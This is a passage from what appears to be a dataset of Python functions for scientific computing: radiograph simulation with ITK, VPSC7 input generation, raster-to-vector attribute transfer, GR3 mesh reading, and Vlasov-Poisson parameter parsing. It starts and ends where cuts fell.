\n ReaderType = itk.ImageFileReader[InputImageType]\n reader = ReaderType.New()\n reader.SetFileName(input_filename)\n \n try:\n print(\"Reading image: \" + input_filename)\n reader.Update()\n print(\"Image Read Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! \\n\")\n print(ValueError)\n sys.exit()\n \n inputImage = reader.GetOutput()\n \n if verbose :\n print(inputImage)\n \n \n #%% ------------------ Transformation \n # This part is inevitable since the interpolator (Ray-cast) and resample Image\n # image filter uses a Transformation -- Here we set it to identity. \n TransformType = itk.CenteredEuler3DTransform[itk.D]\n transform = TransformType.New()\n \n transform.SetRotation(numpy.deg2rad(rot[0]),numpy.deg2rad(rot[1]),numpy.deg2rad(rot[2])) # Setting the rotation of the transform\n transform.SetTranslation(itk.Vector.D3(t)) # Setting the translation of the transform\n transform.SetComputeZYX(True) # The order of rotation will be ZYX. 
\n \n imOrigin = inputImage.GetOrigin() # Get the origin of the image.\n inRes = inputImage.GetSpacing() # Get the resolution of the input image.\n inSiz = inputImage.GetBufferedRegion().GetSize() # Get the size of the input image.\n \n center = itk.Point.D3(imOrigin) + numpy.multiply(inRes,inSiz)/2. # Setting the center of rotation as center of 3D object + offset determined by cor. \n \n transform.SetCenter(center) # Setting the center of rotation. \n \n if verbose :\n print(transform)\n \n #%% \n for ii in range(n_cam):\n imageCalibrationInfo = CalibrationUsingJointTrack.CalibrationTool() # Setting up the image calibration info class. \n imageCalibrationInfo.SetCalibrationInfo(calibration_files[ii]) # Assign the information from the calibration file to the imageCalibrationInfo class. \n \n spaceOutput= imageCalibrationInfo.GetPixelSize() # The resolution (spacing) along x,y,z directions of output image\n \n imageCalibrationInfo.SetOutputImageSize(size[0],size[1],1) # Setting the size of the output image. \n imageCalibrationInfo.SetGlobalOriginForImagePlane() # Setting the global origin of the output image. \n \n originOutput = imageCalibrationInfo.GetGlobalOriginForImagePlane() # Setting the output origin. \n \n directionOutput = imageCalibrationInfo.GetDirectionMatrix() # Direction of Image plane 3x3 matrix. \n focalPoint = imageCalibrationInfo.GetFocalPoint() # Position of the x-ray source. \n \n #%% ----------------- Ray Cast Interpolator \n # In this part the Ray Cast interpolator is defined and applied to the input\n # image data. \n \n InterpolatorType = itk.RayCastInterpolateImageFunction[InputImageType,ScalarType] # Defining the interpolator type from the template. \n interpolator = InterpolatorType.New() # Pointer to the interpolator\n \n interpolator.SetInputImage(inputImage) # Setting the input image data\n interpolator.SetThreshold(threshold) # Setting the output threshold\n interpolator.SetFocalPoint(itk.Point.D3(focalPoint)) # Setting the focal point (x-ray source location)\n interpolator.SetTransform(transform) # Setting the transform (here identity)\n \n if verbose:\n print(interpolator)\n #%%----------------- Resample Image Filter ------------------------\n # In this part the resample image filter to map a 3D image to 2D image plane with desired specs is designed\n \n FilterType = itk.ResampleImageFilter[InputImageType,OutputImageType] # Defining the resample image filter type. \n resamplefilter = FilterType.New() # Pointer to the filter\n resamplefilter.SetInput(inputImage) # Setting the input image data \n resamplefilter.SetDefaultPixelValue(default_pixel_value) # Setting the default Pixel value\n resamplefilter.SetInterpolator(interpolator) # Setting the interpolator\n resamplefilter.SetTransform(transform) # Setting the transform\n resamplefilter.SetSize([size[0],size[1],1]) # Setting the size of the output image. \n resamplefilter.SetOutputSpacing(itk.Vector.D3([spaceOutput[0],spaceOutput[1],1])) # Setting the spacing(resolution) of the output image. 
\n resamplefilter.SetOutputOrigin(originOutput) # Setting the output origin of the image\n Functions.ChangeImageDirection(oldDirection=resamplefilter.GetOutputDirection(),newDirection=directionOutput,DimensionOut=3) # Setting the output direction of the image --- resamplefilter.SetImageDirection(args) was not working properly\n \n resamplefilter.Update() # Updating the resample image filter.\n \n if verbose:\n print(resamplefilter)\n #%%---------------- Rescaler Image Filter --------------------------\n RescalerFilterType = itk.RescaleIntensityImageFilter[InputImageType,OutputImageType] # Defining the rescale image filter. \n rescaler = RescalerFilterType.New() # Pointer to the rescale filter\n rescaler.SetOutputMinimum(min_out) # Minimum output\n rescaler.SetOutputMaximum(max_out) # Maximum output \n rescaler.SetInput(resamplefilter.GetOutput()) # Setting the input to the image filter. \n rescaler.Update() \n \n if verbose:\n print(rescaler)\n \n #%% ------------------ Writer ------------------------------------\n # The output of the resample filter can then be passed to a writer to\n # save the DRR image to a file.\n WriterType = itk.ImageFileWriter[OutputImageType]\n writer = WriterType.New()\n \n outputPath = os.path.join(output_directory,'Cam')+str(ii+1)\n \n if not os.path.exists(outputPath):\n os.mkdir(outputPath)\n \n if ii == 0:\n time = datetime.datetime.now() \n dummy = ('rx'+str(int(rot[0]))+'ry'+str(int(rot[1]))+'rz'+str(int(rot[2]))+'tx'\n + str(int(t[0]))+'ty'+str(int(t[1]))+'tz'+str(int(t[2]))+'y'+str(time.year)+'m'+str(time.month)\n +'d'+str(time.day)+'hr'+str(time.hour)+'m'+str(time.minute)+'s'+str(time.second)+ output_extension)\n \n outputName = 'Cam'+str(ii+1)+dummy\n output_filename = str(os.path.join(outputPath,outputName))\n \n writer.SetFileName(output_filename)\n # writer.SetFileName('/Volumes/Storage/Payam/Desktop/output.nii') \n writer.SetInput(rescaler.GetOutput())\n \n try:\n print(\"Writing image: \" + output_filename)\n writer.Update()\n print(\"Image Printed Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! \\n\")\n print(ValueError)\n sys.exit()\n \n \n # Writing the transformed volume\n if transformed_vol:\n WriterType=itk.ImageFileWriter[InputImageType]\n writer3d=WriterType.New()\n \n output_filename3d = os.path.join(output_directory,'TransformedVolume'+output_extension)\n writer3d.SetFileName(output_filename3d)\n writer3d.SetInput(resamplefilter.GetOutput())\n \n try:\n print(\"Writing the transformed Volume at : \" + output_filename3d)\n writer.Update()\n print(\"Volume Printed Successfully\")\n except ValueError: \n print(\"ERROR: ExceptionObject cauth! 
\\n\")\n print(ValueError)\n sys.exit()", "def vpsc_in(\r\n ## # elem, ph and vol fraction of phases.\r\n ## and ishape for flag for morphology updates\r\n nelem=1, nph=1, wph =[1.0, 0.0], ishape=[0,],\r\n\r\n #framgmentation options and critical value limit \r\n # in distortion of the inclusion \r\n # as well as ellipsoid description: orientation and \r\n # principal lengths of'em\r\n fragmentn = [0,0], crit = [25,25],\r\n ellipangl = [[0., 0., 0.],[0.,0.,0.]],\r\n ellipaxes = [[1., 1., 1.],[1.,1.,1.]],\r\n \r\n # vpsc7.in file name (fixed)\r\n # texture, singlecrystal and shape file names in list format\r\n vin_name = 'VPSC7.in',\r\n tfile= ['texture/500.tex',],\r\n sxfile=['sx/hijhiihb.sx',],\r\n fileaxes=['shape1.100', 'shape1.100'],\r\n\r\n ### precision settings for convergence prodcedure\r\n ##\r\n err=0.001, errd=0.001, errm=0.001, errso=0.01,\r\n nmxiter=100, exiter=100, initer=100,\r\n irsvar=0, xrsini=2, xrsfin=10, xrstep=2,\r\n\r\n ### post-mortem flags, texture component calc. flag.\r\n ## \r\n irecover = 0, isave=0, icubcomp = 0, nwrite = 0, \r\n\r\n ## Single crystal hardening rule (-2: dislocation, 0:Voce, 1: MTS, 2: composite)\r\n ihardlaw = 0, \r\n\r\n ## fluctuation flag\r\n iflu = 0,\r\n\r\n ## rate insensitive, interaction :(FC,aff,2:sec,3:neff,4:tan,5:SO)\r\n ## update flags for orient, grain shape, hardening, itran(youngung)\r\n ## nneigh (0 for no neighbors, 1 for pairs, etc.)\r\n iratesens = 0, interaction = 3, iupdate = [1,1,1,0], nneigh = 0, \r\n\r\n ## proce number and processes\r\n npro = None,\r\n prcs = [], #processes\r\n \r\n ishow=False\r\n ):\r\n try: os\r\n except: import os\r\n else: pass\r\n cwd = os.getcwd()\r\n\r\n # READ EXISITING 'vpsc7.in'\r\n if os.path.isfile(vin_name): #if there already exists the file!\r\n f_vin = file(vin_name, 'r')\r\n lines = f_vin.read()\r\n lines = lines.split('\\n')\r\n f_temp = file('%s.tmp'%vin_name, 'w')\r\n for i in lines:\r\n f_temp.writelines(i)\r\n f_temp.writelines('\\n')\r\n pass\r\n f_temp.close()\r\n f_vin.close()\r\n \"\"\"\r\n # DEL EXISITING 'vpsc7.in'\r\n f_vin.close()\r\n os.remove(vin_name)\r\n \"\"\"\r\n # MAKE NEW 'vpsc7.in'\r\n f_vin = file(vin_name, 'w')\r\n f_vin.writelines('%i nelem\\n'%(nelem))\r\n f_vin.writelines('%i nph\\n'%(nph))\r\n for i in range(nph):\r\n f_vin.writelines('%f '%(wph[i]))\r\n f_vin.writelines(' wph[i]\\n')\r\n for i in range(nph): \r\n f_vin.writelines('*** INFORMATION ABOUT PHASE #%i\\n'%(i+1))\r\n f_vin.writelines('%i %i %i'%(ishape[i], fragmentn[i], crit[i]))\r\n f_vin.writelines(' ishape, fragmentn, crit aspect\\n')\r\n f_vin.writelines('%f %f %f'%(ellipaxes[i][0], \r\n ellipaxes[i][1], \r\n ellipaxes[i][2]))\r\n f_vin.writelines(' initial ellipsoid ratios (dummy if ishape=4)\\n')\r\n f_vin.writelines('%f %f %f'%(ellipangl[i][0], \r\n ellipangl[i][1], \r\n ellipangl[i][2]))\r\n f_vin.writelines(' init Eul ang ellips axes(dummy if ishape=3,4)\\n')\r\n # WRITES TEXTURE FILE\r\n f_vin.writelines('----------- filetext\\n')\r\n f_vin.writelines(tfile[i]+'\\n')\r\n f_vin.writelines('----------- sxfile\\n')\r\n # WRITES SINGLE CRYSTAL FILE\r\n f_vin.writelines(sxfile[i]+'\\n')\r\n # WRITES SHAPE FILE\r\n f_vin.writelines('----------- fileaxes (dummy if ishape=0) \\n')\r\n f_vin.writelines('%s \\n'%(fileaxes[i]))\r\n\r\n\r\n #### precision control block ###\r\n f_vin.writelines('*** PRECISION SETTINGS FOR')\r\n f_vin.writelines(' CONVERGENCE PROCEDURES (default values)\\n')\r\n f_vin.writelines('%f %f %f %f'%(err, #err\r\n errd, \r\n errm,\r\n errso))\r\n f_vin.writelines(' 
errs,errd,errm,errso\\n')\r\n f_vin.writelines('%i %i %i %25s'%( nmxiter, exiter, initer,' '))\r\n f_vin.writelines('itmax: max # of iter, external, internal and SO loops\\n')\r\n f_vin.writelines('%i %i %i %i %30s'%(irsvar, xrsini, xrsfin, xrstep,' '))\r\n f_vin.writelines('irsvar & xrsini, xrsfin, xrstep (dummy if irsvar = 0) \\n')\r\n f_vin.writelines(\"%i ibcinv (0: don't use <Bc>**-1, 1: use \\n\"%(1))\r\n f_vin.writelines('*** INPUT/OUTPUT SETTINGS FOR THE RUN(default is zero)\\n')\r\n f_vin.writelines('%i irecover:read grain stats from POSTMORT.IN(1) OR NOT(0)\\n'%(irecover))\r\n f_vin.writelines(\"%i isave: write grain states in postmor.out at step 'isave'?\\n\"%(isave))\r\n f_vin.writelines(\"%i icubcompL calcuate fcc rolling components?\\n\"%(icubcomp))\r\n f_vin.writelines(\"%i nwrite (frequency of texture downloads)\\n\"%(nwrite))\r\n f_vin.writelines(\"*** MODELING CONDITIONS FOR THE RUN \\n\")\r\n f_vin.writelines(\"%i ihardlaw(0:VOCE, 1: MTS, 2: composite grain\\n\"%(ihardlaw))\r\n f_vin.writelines('%1i' %(iratesens))\r\n f_vin.writelines(' iratesens (0:rate insensitive, 1:rate sensitive) \\n')\r\n f_vin.writelines('%1i' %(interaction))\r\n f_vin.writelines(' interaction (0:FC,1:affine,2:secant,3:neff=10,4:tangent,5:SO) \\n')\r\n f_vin.writelines('%1i%3i%3i%3i'%(iupdate[0],iupdate[1],iupdate[2],iupdate[3]))\r\n f_vin.writelines(' iupdate: update ori, grain shape, hardening, itran \\n')\r\n f_vin.writelines('%1i'%(nneigh))\r\n f_vin.writelines(' nneigh (0 for no neighbors, 1 for pairs, etc.)\\n')\r\n f_vin.writelines('%i'%(iflu))\r\n f_vin.writelines(\" iflu(0:don't calc, 1: calc fluctuations\\n\")\r\n\r\n f_vin.writelines(\"*NUMBER OF PROCESSES\\n\")\r\n f_vin.writelines(\"%i \\n\"%(npro))\r\n f_vin.writelines(\"** (0,1: loadings, 2:pcys, 3:lankf, 4: RBR,\")\r\n f_vin.writelines(\"5:pcys_pl, 6: pysc_pl 6d(ix,iy, nprob, ang\")\r\n f_vin.writelines(\"( or if negative behave like pcys))) \\n\")\r\n for i in range(len(prcs)):\r\n f_vin.writelines(prcs[i]+'\\n')\r\n \r\n # Closure of the file\r\n f_vin.close() \r\n # -------------------\r\n\r\n # Printing-out the just-made-vpsc7.in file\r\n if ishow==True:\r\n if os.name=='nt' or os.name=='posix':\r\n print \"****** VPSC input file ******\"\r\n print \"* VPSC7 input parameters \"\r\n print \"* has been written down to \"\r\n print \"* '%8s' as below\"%vin_name\r\n print \"*****************************\\n\"\r\n if os.name=='nt':\r\n os.system('%s %s'%('type',vin_name))\r\n elif os.name=='posix':\r\n os.system('%s %s'%('cat',vin_name))\r\n else: pass", "def transfer_rast_to_vect(poly_cstr, lyrname, out_field, rast_cstr, srs, method, where=None, geom_field=\"geometry\",\n id_field=\"ogc_fid\", buffer_rad=0, restrict_to_tile=True):\n ds = gdal.Open(rast_cstr)\n georef = ds.GetGeoTransform()\n raster_array = ds.ReadAsArray()\n img_shape = (ds.RasterYSize, ds.RasterXSize)\n LOG.info(\"Done reading raster, shape is: %s\", img_shape)\n ctx = {\n 'lyrname': lyrname,\n 'out_field': out_field,\n 'where': where,\n 'geom_field': geom_field,\n 'id_field': id_field,\n \"srs\": srs\n }\n if buffer_rad:\n ctx['geom_field'] = 'st_buffer({}, {})'.format(geom_field, buffer_rad)\n layer_sql = \"\"\"select {geom_field}, {out_field}, {id_field} as the_id from {lyrname}\"\"\".format(**ctx)\n if restrict_to_tile:\n # Weird geoms could be skipped by this, so add as an optione\n layer_sql += \" where st_intersects({geom_field}, st_geomfromtext(WKT_EXT, {srs}))\".format(**ctx)\n\n if where:\n if restrict_to_tile:\n layer_sql += \" and \" + where\n else:\n 
layer_sql += \" where \" + where\n LOG.info(\"Layersql: %s\", layer_sql)\n extent = get_extent(georef, img_shape)\n LOG.info(\"Extent: %s\", extent)\n vec_ds, lyr = open(poly_cstr, layersql=layer_sql, extent=extent, open_for_update=True)\n mask = just_burn_layer(lyr, georef, img_shape, attr='the_id', dtype=np.int32, all_touched=False)\n LOG.info(\"Done burning - setting attr in %d features\", lyr.GetFeatureCount())\n LOG.debug(\"%s\", np.unique(mask))\n n_ok = 0\n for n, feat in enumerate(lyr):\n if n % 100 == 0:\n LOG.info(\"Done: %d, ok: %d\", n, n_ok)\n daid = feat['the_id']\n ctx['the_id'] = daid\n area = feat.GetGeometryRef().GetArea()\n I, J = np.where(mask == daid)\n # At least 30% covered if already set - todo: provide this as argument\n if I.size > 0 and (feat[out_field] is None or I.size * (georef[1] ** 2) > area * 0.3):\n is_ok, val = method(raster_array, I, J)\n if is_ok:\n n_ok += 1\n ctx['_value_'] = val\n updatesql = \"update {lyrname} set {out_field}={_value_} where {id_field}={the_id}\".format(**ctx)\n LOG.debug(\"Executing: %s\", updatesql)\n vec_ds.ExecuteSQL(updatesql)\n else:\n LOG.debug(\"Nothing found for %s - mask size: %s, valid: %s, area: %s\",\n daid, I.size, feat.GetGeometryRef().IsValid(), area)", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. 
Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def mrtrix_mesh2vox(surface_path, template_path, temp_dir, output_prefix):\n # Adapt affine translation using metadata\n template = nib.load(template_path)\n _, _, meta = read_geometry(surface_path, read_metadata=True)\n\n template = nib.as_closest_canonical(template)\n affine = template.affine.copy()\n affine[:-1, -1] = template.affine[:-1, -1] - meta['cras']\n\n new_template = nib.Nifti1Image(template.dataobj, affine)\n new_template_path = temp_dir / 'template.mgz'\n nib.save(new_template, new_template_path)\n\n # Reconstruct volume from mesh\n subprocess.run(['mesh2voxel', surface_path, new_template_path, temp_dir / f'{output_prefix}_output.mgz'])\n\n # Save the reconstructed volume with the right affine\n output = nib.load(temp_dir / f'{output_prefix}_output.mgz')\n new_output = nib.Nifti1Image(output.dataobj, template.affine)\n # nib.save(new_output, output_path)\n\n return new_output", "async def transform(self, file):\n\t\tpass", "def load_rd_uv(in_file):\n uv_data = np.load(in_file)\n return uv_data['ucs'], uv_data['vcs']", "def inputfile(filename):\n infile = open(filename, 'r')\n lines = infile.readlines()\n\n # --------------------------------------------------------------------------\n # Domain specifications\n\n Nx = eval(lines[15][lines[15].find('=')+1:].strip())\n ax = eval(lines[16][lines[16].find('=')+1:].strip())\n bx = eval(lines[17][lines[17].find('=')+1:].strip())\n\n Ny = eval(lines[21][lines[21].find('=')+1:].strip())\n ay = eval(lines[22][lines[22].find('=')+1:].strip())\n by = eval(lines[23][lines[23].find('=')+1:].strip())\n\n Nz = eval(lines[27][lines[27].find('=')+1:].strip())\n az = eval(lines[28][lines[28].find('=')+1:].strip())\n bz = eval(lines[29][lines[29].find('=')+1:].strip())\n\n Nvx = eval(lines[33][lines[33].find('=')+1:].strip())\n avx = eval(lines[34][lines[34].find('=')+1:].strip())\n bvx = eval(lines[35][lines[35].find('=')+1:].strip())\n\n Nvy = eval(lines[39][lines[39].find('=')+1:].strip())\n avy = eval(lines[40][lines[40].find('=')+1:].strip())\n bvy = eval(lines[41][lines[41].find('=')+1:].strip())\n\n Nvz = eval(lines[45][lines[45].find('=')+1:].strip())\n avz = eval(lines[46][lines[46].find('=')+1:].strip())\n bvz = eval(lines[47][lines[47].find('=')+1:].strip())\n\n Nt = eval(lines[51][lines[51].find('=')+1:].strip())\n T = eval(lines[52][lines[52].find('=')+1:].strip())\n\n N = eval(lines[58][lines[58].find('=')+1:].strip())\n\n # --------------------------------------------------------------------------\n # Broadcast notification regarding start of simulation and order of solver\n\n print \"\\nStarting 1D1V Vlasov-Poisson simulation\"\n print \"\\nadvection solver: LTE 
order %d\" % (N+1)\n\n # --------------------------------------------------------------------------\n # Boundary conditions\n\n # stored as a dictionary of dictionaries, access as\n # BC['z']['upper'] and BC['z']['lower'] for z = {x, y, ...}\n\n BC = {}\n # main dictionary with key/values {'x' : {'lower' : value, 'upper : value},\n # {'y' : {'lower' : value, 'upper : value},\n # {'z' : {'lower' : value, 'upper : value},\n # {'vx' : {'lower' : value, 'upper : value},\n # {'vy' : {'lower' : value, 'upper : value},\n # {'vz' : {'lower' : value, 'upper : value},\n\n\n # subdictionaries with key/values {'lower' : BC_value, and 'upper' : BC_value}\n BC['x'] = {}\n BC['x']['lower'] = lines[18][lines[18].find('=')+1:].strip()\n BC['x']['upper'] = lines[19][lines[19].find('=')+1:].strip()\n\n BC['y'] = {}\n BC['y']['lower'] = lines[24][lines[24].find('=')+1:].strip()\n BC['y']['upper'] = lines[25][lines[25].find('=')+1:].strip()\n\n BC['z'] = {}\n BC['z']['lower'] = lines[30][lines[30].find('=')+1:].strip()\n BC['z']['upper'] = lines[31][lines[31].find('=')+1:].strip()\n\n BC['vx'] = {}\n BC['vx']['lower'] = lines[36][lines[36].find('=')+1:].strip()\n BC['vx']['upper'] = lines[37][lines[37].find('=')+1:].strip()\n\n BC['vy'] = {}\n BC['vy']['lower'] = lines[42][lines[42].find('=')+1:].strip()\n BC['vy']['upper'] = lines[43][lines[43].find('=')+1:].strip()\n\n BC['vz'] = {}\n BC['vz']['lower'] = lines[48][lines[48].find('=')+1:].strip()\n BC['vz']['upper'] = lines[49][lines[49].find('=')+1:].strip()\n\n # --------------------------------------------------------------------------\n # Store number of active gridpoints for every phase space variable\n #\n # Note: for periodic BCs: Nz_active = Nz - 1\n # for all other BCs: Nz_active = Nz\n\n # TODO this is acknowledged as being redundant, but more specific than the lists\n # active_dims vs. total_dims\n if BC['x']['lower'] == 'periodic' and BC['x']['upper'] == 'periodic' and Nx is not None:\n Nx_active = Nx - 1\n else:\n Nx_active = Nx\n\n if BC['y']['lower'] == 'periodic' and BC['y']['upper'] == 'periodic' and Ny is not None:\n Ny_active = Ny - 1\n else:\n Ny_active = Ny\n\n if BC['z']['lower'] == 'periodic' and BC['z']['upper'] == 'periodic' and Nz is not None:\n Nz_active = Nz - 1\n else:\n Nz_active = Nz\n\n if BC['vx']['lower'] == 'periodic' and BC['vx']['upper'] == 'periodic' and Nvx is not None:\n Nvx_active = Nvx - 1\n else:\n Nvx_active = Nvx\n\n if BC['vy']['lower'] == 'periodic' and BC['vy']['upper'] == 'periodic' and Nvy is not None:\n Nvy_active = Nvy - 1\n else:\n Nvy_active = Nvy\n\n if BC['vz']['lower'] == 'periodic' and BC['vz']['upper'] == 'periodic' and Nvz is not None:\n Nvz_active = Nvz - 1\n else:\n Nvz_active = Nvz\n\n # --------------------------------------------------------------------------\n # High order correction (HOC) method applied to each phase space variable\n\n HOC = {}\n HOC['x'] = lines[68][lines[68].find(':')+1:].strip().upper()\n HOC['y'] = lines[69][lines[69].find(':')+1:].strip().upper()\n HOC['z'] = lines[70][lines[70].find(':')+1:].strip().upper()\n\n HOC['vx'] = lines[72][lines[72].find(':')+1:].strip().upper()\n HOC['vy'] = lines[73][lines[73].find(':')+1:].strip().upper()\n HOC['vz'] = lines[74][lines[74].find(':')+1:].strip().upper()\n\n\n # list of phase space variables used, in etc/params.dat must set unused\n # vars to have Nz as None, z = x, vx, y, ...\n # e.g. 
in 1D1V, phasespace_vars = ['x', 'vx']\n phasespace_vars = []\n if Nx is not None:\n phasespace_vars.append('x')\n if Ny is not None:\n phasespace_vars.append('y')\n if Nz is not None:\n phasespace_vars.append('z')\n if Nvx is not None:\n phasespace_vars.append('vx')\n if Nvy is not None:\n phasespace_vars.append('vy')\n if Nvz is not None:\n phasespace_vars.append('vz')\n\n print \"will step through %d-dimensional solution in variables: %s\" % (len(phasespace_vars), phasespace_vars)\n for var in phasespace_vars:\n print \"high order correction method on %s: %s\" % (var, HOC[var])\n\n # for periodic BCs, the number of active dims is not equal to the\n # total number of dims, we evolve \"Nz-1\" gridpoints, then assign\n # the Nth point by periodicity as equal to the 0th point. Hence,\n # a distinction is needed between active dims and total dims\n # where we note they are identical in all cases but periodic BCs.\n\n # TODO as mentioned above, this is now a redundant set of total grid points\n # as compared to active grid points. At some point, need to trace where\n # this is actually used in the code and replace or remove it\n\n # initialize lists\n total_dims = []\n active_dims = []\n\n # strip all whitespace in each entry\n for var in phasespace_vars:\n total_dims.append(eval('N' + var))\n\n if ( (BC[var]['lower'] == 'periodic') and (BC[var]['upper'] == 'periodic') ):\n active_dims.append(eval('N' + var) - 1)\n else:\n active_dims.append(eval('N' + var))\n\n # TODO this is a misleading name, should be numvars\n numdims = len(phasespace_vars)\n\n # --------------------------------------------------------------------------\n # Initial density specification\n #\n # the following establishes a difference between the number of densities\n # specified in etc/params.dat. Should there be two, the solver is a two\n # species Vlasov solver. 
If only one, then a cold background will be\n # automatically computed (TODO)\n\n\n densities_list = lines[79][lines[79].find(':')+1:].strip().split(', ')\n for i in range(len(densities_list)):\n densities_list[i] = densities_list[i].lower()\n\n if len(densities_list) == 2: # if two species return dictionary of strings\n density = {}\n density['electrons'] = densities_list[0]\n density['electrons'] = density['electrons'].lower()\n density['ions'] = densities_list[1]\n density['ions'] = density['ions'].lower()\n print \"\\ntwo species simulation with initial densities:\\n\"\n print \"electrons: %s\" % density['electrons']\n print \"ions: %s\\n\" % density['ions']\n\n elif len(densities_list) == 1: # if one species return a string\n density = densities_list[0]\n print \"one species (electron) simulation with initial density: %s\" % density\n # TODO compute cold background, store both this and the above\n # in a common dictionary as above for two species.\n\n # --------------------------------------------------------------------------\n # Split scheme specification\n\n split_scheme = lines[98][lines[98].find('=')+1:].strip()\n split_scheme = split_scheme.upper()\n print \"split scheme: %s\\n\\n\" % split_scheme\n\n # filepath to splitting coefficient tables\n filename = lines[99][lines[99].find(':')+1:].strip()\n filepath = './etc/' + filename\n\n # get splitting coefficients for chosen scheme\n if split_scheme is not None:\n splitting = splitting_coefficients(filepath, split_scheme)\n else:\n splitting = None\n\n # --------------------------------------------------------------------------\n # Plot window specification (used in lib.plots.Setup)\n\n xmin = eval(lines[113][lines[113].find('=')+1:].strip())\n xmax = eval(lines[114][lines[114].find('=')+1:].strip())\n ymin = eval(lines[116][lines[116].find('=')+1:].strip())\n ymax = eval(lines[117][lines[117].find('=')+1:].strip())\n\n plot_params = dict(xmin = xmin, xmax = xmax,\n ymin = ymin, ymax = ymax)\n\n record_outputs = lines[120][lines[120].find(':')+1:].strip()\n record_outputs = record_outputs.lower()\n\n if record_outputs == 'yes':\n # output filepath setup\n filename = lines[121][lines[121].find(':')+1:].strip()\n filepath = './etc/' + filename\n outfiles = output_files(filepath) # dictionary of opened files\n else:\n outfiles = None\n\n # --------------------------------------------------------------------------\n # MISC STORAGE (e.g. stored matrices that are used routinely)\n #\n # dictionaries and matrices relevant for high order correction applications\n #\n # Constructing the finite different weight matricies, W.\n #-------------------------------------------------------\n # requires: (dict) FD_schemes\n #\n # Note: FD_schemes is only needed to construct W. W is what is used in\n # the simulation. Hence, the building routine for FD_schemes\n # is not optimized, since it happens before the simulation starts\n # and hence is not a source of repeated computational cost.\n #\n # FD_schemes is a dictionary containing the families of every order derivative\n # needed for the indicated global error N in etc/params.dat, i.e. all schemes\n # of various degrees of asymmetry and handedness. For large N, this can be a\n # very large dictionary, see the function routine read_FD_schemes to see all\n # that gets stored inside. It is used to construct the difference coefficient\n # matrices W (for applying high order corrections). 
The other scheme\n # FD_scheme_dn1 is used to construct the matrix W_dn1 which is a difference\n # coefficient matrix for the first derivative (dn = 1) at LTE = 6, and used\n # in the finite difference 6th order Poisson solver (PBCs currently only).\n #---------------------------------------------------------------------------\n #\n # initialize all dictionaries whose keys correspond to phase space vars\n # and whose values contain the relevant ndarrays\n\n Xi = {}\n xi = {}\n W = {}\n\n # top level check: if any var has FD corrections, store FD_schemes and init W\n if 'FD' in HOC.values():\n # store finite difference schemes\n FD_schemes = read_FD_schemes(N)\n\n if HOC['x'] == 'FD':\n # first derivative with LTE = 6, used to find dphi = -E after phi is\n # found from a 6th order Poisson solve\n FD_scheme_dn1 = read_FD_scheme(1,6)\n W_dn1_LTE6 = assemble_finite_difference_weight_matrix_const_dn_const_LTE(Nx_active,\n FD_scheme_dn1,\n dn = 1,\n LTE = 6\n )\n\n # TODO if more than one or different spatial dimension\n # TODO than 'x' with FD corrections need to permit access to this\n # TODO dictionary W_dn1_LTE6 and have it be assembled.\n\n else:\n # else, Fourier Gauss solver is used, no need for this matrix\n W_dn1_LTE6 = None\n\n # variable-by-variable checks: assemble consistent objects needed\n # for the specified means of HOC from etc/params.dat\n\n # Note: the following is organized with the expectation that\n # higher dimensional implementations would be stepped through\n # as sets of 2D advection problems, always paired as z and vz\n # i.e. not as mixed stepthroughs with x paired with vy for example\n\n for var in phasespace_vars:\n if HOC[var] == 'FD':\n W[var] = assemble_finite_difference_weight_matrix(\n eval('N' + var + '_active'),\n N,\n 